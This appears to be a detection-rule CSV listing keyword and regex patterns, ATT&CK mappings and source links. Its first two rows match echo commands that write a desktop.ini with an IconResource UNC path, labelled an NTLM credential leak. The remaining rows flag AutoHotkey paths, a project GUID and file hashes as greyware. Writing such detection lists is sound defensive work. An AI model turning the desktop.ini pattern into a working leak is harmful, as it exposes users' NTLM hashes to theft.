"*echo [.ShellClassInfo] > desktop.ini*",".{0,1000}echo\s\[\.ShellClassInfo\]\s\>\sdesktop\.ini.{0,1000}","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*echo IconResource=\\*\* >> desktop.ini*",".{0,1000}echo\sIconResource\=\\\\.{0,1000}\\.{0,1000}\s\>\>\sdesktop\.ini.{0,1000}","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*/AutoHotkey.exe*",".{0,1000}\/AutoHotkey\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*/AutoHotkey.git*",".{0,1000}\/AutoHotkey\.git.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*/AutoHotkey/releases/download/*",".{0,1000}\/AutoHotkey\/releases\/download\/.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*/AutoHotkey_*.zip*",".{0,1000}\/AutoHotkey_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*/AutoHotkey64.exe*",".{0,1000}\/AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*\AutoHotkey.dll*",".{0,1000}\\AutoHotkey\.dll.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*\AutoHotkey.exe*",".{0,1000}\\AutoHotkey\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*\AutoHotkey_*.zip*",".{0,1000}\\AutoHotkey_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*\AutoHotkey64.exe*",".{0,1000}\\AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*\AutoHotkey-main*",".{0,1000}\\AutoHotkey\-main.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*\AutoHotkeyx.sln*",".{0,1000}\\AutoHotkeyx\.sln.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*04eb8295af197da058cec5a2b78b8b7f6bcee7299cbadebf68dc6837968c5bb0*",".{0,1000}04eb8295af197da058cec5a2b78b8b7f6bcee7299cbadebf68dc6837968c5bb0.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*0759be5242a162707b9738226af1a163a15fc6e0105dd88765a52e056ac136c4*",".{0,1000}0759be5242a162707b9738226af1a163a15fc6e0105dd88765a52e056ac136c4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*0c9f95a64d12580994ffbdd1ba90e8e020a97056d06615c3e6ced6001a7beea4*",".{0,1000}0c9f95a64d12580994ffbdd1ba90e8e020a97056d06615c3e6ced6001a7beea4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*0d0811072bcce0b852fe3b5da38b12fdbc8e91a419df88c0ff6b09ba0fcb4ca4*",".{0,1000}0d0811072bcce0b852fe3b5da38b12fdbc8e91a419df88c0ff6b09ba0fcb4ca4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*107fd4550d60e934e88f65b15a00c8eca224f279ed593288d5ad9743ef7f35a4*",".{0,1000}107fd4550d60e934e88f65b15a00c8eca224f279ed593288d5ad9743ef7f35a4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*15285219ad07eaa012de59c3001b67f65fd7382d913fde559219ab1f180d6fcc*",".{0,1000}15285219ad07eaa012de59c3001b67f65fd7382d913fde559219ab1f180d6fcc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*1578e1c16807f4f9c02cf9d284cf774ad4725b55f114dae0778a2f29ff9e2c47*",".{0,1000}1578e1c16807f4f9c02cf9d284cf774ad4725b55f114dae0778a2f29ff9e2c47.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*16089612f48695d4bb779fc1eb56596d264a54443ba461e8b9c4df9afa7cbcab*",".{0,1000}16089612f48695d4bb779fc1eb56596d264a54443ba461e8b9c4df9afa7cbcab.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*178f4b8888441e6970682416279fb99a5ffb2844136440becd66a8c62091e435*",".{0,1000}178f4b8888441e6970682416279fb99a5ffb2844136440becd66a8c62091e435.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*1c8697533f19519535ac3679b54beb9632476b3f13adf0d58708b6c4db55e310*",".{0,1000}1c8697533f19519535ac3679b54beb9632476b3f13adf0d58708b6c4db55e310.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*1d9e35fcbf660435ec27cf36a00e87d80928f36e8edb2d7728abaa00585dac08*",".{0,1000}1d9e35fcbf660435ec27cf36a00e87d80928f36e8edb2d7728abaa00585dac08.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*207fea03708f1ba8c8e61f30170d799495736726d1853d7d4150a5ffffa14013*",".{0,1000}207fea03708f1ba8c8e61f30170d799495736726d1853d7d4150a5ffffa14013.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*20878974725227ec21e88d6e91c9ed2615981faa9ab9ee9821268008fd0cb1c7*",".{0,1000}20878974725227ec21e88d6e91c9ed2615981faa9ab9ee9821268008fd0cb1c7.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*20d41f5fcfa4f3d61c533a9e21a019f0bca0bd8012a6528ccdf2621749a122ab*",".{0,1000}20d41f5fcfa4f3d61c533a9e21a019f0bca0bd8012a6528ccdf2621749a122ab.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*24351cf8346262f0dcb4bab290b55ee65de503921906f13dfd106ef259d5fb7f*",".{0,1000}24351cf8346262f0dcb4bab290b55ee65de503921906f13dfd106ef259d5fb7f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*25ce0fa078c6603a909bb391c1cb4eb891554b29ad275beea47042962576f4ff*",".{0,1000}25ce0fa078c6603a909bb391c1cb4eb891554b29ad275beea47042962576f4ff.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*2afc21c42cca8caf03b00e22e95592ff6cbeb6ef64bd816eb9d32ed260818cb6*",".{0,1000}2afc21c42cca8caf03b00e22e95592ff6cbeb6ef64bd816eb9d32ed260818cb6.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*2c5626009786be43363b7ab1c2cca6a7b0eb57bdf6c40464f2abe874341b0485*",".{0,1000}2c5626009786be43363b7ab1c2cca6a7b0eb57bdf6c40464f2abe874341b0485.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*2cd1b00947abe2df2cba3997d7bdd5a9043ebe598987f0e9cade0aceb73f9edd*",".{0,1000}2cd1b00947abe2df2cba3997d7bdd5a9043ebe598987f0e9cade0aceb73f9edd.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*2df6d9782b8656772c842c22b6582ee91782bde800f345491a71eb72c294e6fc*",".{0,1000}2df6d9782b8656772c842c22b6582ee91782bde800f345491a71eb72c294e6fc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*2e57c62a9fe28ddf0a4da23123c2622652dde869c366f6f1da6ff8bf78dd50c7*",".{0,1000}2e57c62a9fe28ddf0a4da23123c2622652dde869c366f6f1da6ff8bf78dd50c7.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*2e980bd99add2b0859b0bd6586dddcd688e1f8588ef6c9bf5922674e947a6dc6*",".{0,1000}2e980bd99add2b0859b0bd6586dddcd688e1f8588ef6c9bf5922674e947a6dc6.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*2f58a372dc62e70149bd29621cb76049c438204127426299b9a8bdcff002c23a*",".{0,1000}2f58a372dc62e70149bd29621cb76049c438204127426299b9a8bdcff002c23a.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*314215d36ba200db6ce4ea71ff15203b3b048203621329269801c6c27042ba7c*",".{0,1000}314215d36ba200db6ce4ea71ff15203b3b048203621329269801c6c27042ba7c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*31bd31d107caf59b48fcdc9af0f428d80aafb0e1a7166b32aa047b3b495d8457*",".{0,1000}31bd31d107caf59b48fcdc9af0f428d80aafb0e1a7166b32aa047b3b495d8457.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*3225d34d16ecfb04fca67e9ed68230ebcbe65bafe70b12ca0c687a039ebe0851*",".{0,1000}3225d34d16ecfb04fca67e9ed68230ebcbe65bafe70b12ca0c687a039ebe0851.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*36d16c928a88a7a600fb6d3599f13e1b601c79b0eafd7cb1e2dde43d42893d0f*",".{0,1000}36d16c928a88a7a600fb6d3599f13e1b601c79b0eafd7cb1e2dde43d42893d0f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*38b5790e1fd1bea17231a3a55e701217ebde42428046e029f609b1d1734c7140*",".{0,1000}38b5790e1fd1bea17231a3a55e701217ebde42428046e029f609b1d1734c7140.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*38c646e446ecfec33fded951544ee72eab17433e43c997e9c56bd7ccf1d7aaa4*",".{0,1000}38c646e446ecfec33fded951544ee72eab17433e43c997e9c56bd7ccf1d7aaa4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*39037993-9571-4DF2-8E39-CD2909043574*",".{0,1000}39037993\-9571\-4DF2\-8E39\-CD2909043574.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#GUIDproject","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*3a2f34f529cd12950c905d2c68637bb071a12ebd0c00dd887d807fe6c23de762*",".{0,1000}3a2f34f529cd12950c905d2c68637bb071a12ebd0c00dd887d807fe6c23de762.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*3d064459b1bd3505d03217197c2dfa4db9efc0e9f71e6caaf1706ab8697b9a03*",".{0,1000}3d064459b1bd3505d03217197c2dfa4db9efc0e9f71e6caaf1706ab8697b9a03.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*3eb961a803189e9d9d3195464a55acf9eebcd5f626c7e176c906b9639f43169e*",".{0,1000}3eb961a803189e9d9d3195464a55acf9eebcd5f626c7e176c906b9639f43169e.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*3f1b1ca2800dbae254969ed5365848e4fbcf8725ec68d265c40318fe7e3d51a3*",".{0,1000}3f1b1ca2800dbae254969ed5365848e4fbcf8725ec68d265c40318fe7e3d51a3.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*3ff847c73e2ab0d5f1f1440046cd001d25639793a352d9558b24708d77ac3127*",".{0,1000}3ff847c73e2ab0d5f1f1440046cd001d25639793a352d9558b24708d77ac3127.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*411ea6ded074b7a3e461672d528e2a8e80bddcbaddcba7a2addbc4399e44d140*",".{0,1000}411ea6ded074b7a3e461672d528e2a8e80bddcbaddcba7a2addbc4399e44d140.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*487413ff39c7aa044e1b5ab8a0047d6ef7c9c25550fec4d91e8a0a97fd1282ac*",".{0,1000}487413ff39c7aa044e1b5ab8a0047d6ef7c9c25550fec4d91e8a0a97fd1282ac.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*49a48e879f7480238d2fe17520ac19afe83685aac0b886719f9e1eac818b75cc*",".{0,1000}49a48e879f7480238d2fe17520ac19afe83685aac0b886719f9e1eac818b75cc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*4c517113f22937a313921b73c9b25463cc7ed0b77d9cf42b08b6443184e52e90*",".{0,1000}4c517113f22937a313921b73c9b25463cc7ed0b77d9cf42b08b6443184e52e90.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*4de829c7a5e19e8578b398793c952c1ea1a3a1df54f354f46ff140a4932da53f*",".{0,1000}4de829c7a5e19e8578b398793c952c1ea1a3a1df54f354f46ff140a4932da53f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*4e07de6f89b7dd371735d0360afc61ac21d19ea7c4b3f020e2e1a6b17b61432c*",".{0,1000}4e07de6f89b7dd371735d0360afc61ac21d19ea7c4b3f020e2e1a6b17b61432c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
